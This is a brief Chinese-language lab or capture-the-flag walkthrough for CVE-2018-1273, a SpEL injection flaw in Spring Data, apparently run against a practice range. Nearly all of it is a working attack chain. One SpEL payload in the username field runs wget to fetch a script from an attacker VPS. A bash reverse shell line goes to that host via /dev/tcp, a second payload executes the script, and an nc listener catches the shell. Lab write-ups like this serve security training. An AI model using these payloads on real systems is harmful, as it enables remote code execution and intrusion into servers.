名称:spring-cve_2018_1273
描述:
漏洞挖掘
①
运行靶场,进行访问
②
填加{users}后缀,填写数据,抓取数据包
添加数据{admin;admin;admin}
③
修改发送包,添加POC
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("wget --output-document /tmp/rce http://VPSIP:Port/shell.txt")]=&password=&repeatedPassword=
④
打开VPS的http,进行下载bash执行代码
bash -i >& /dev/tcp/VPSIP/Port 0>&1
⑤
在BP中执行代码,反弹shell
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash /tmp/rce")]=&password=&repeatedPassword=
nc -lvp 9999
拿到flag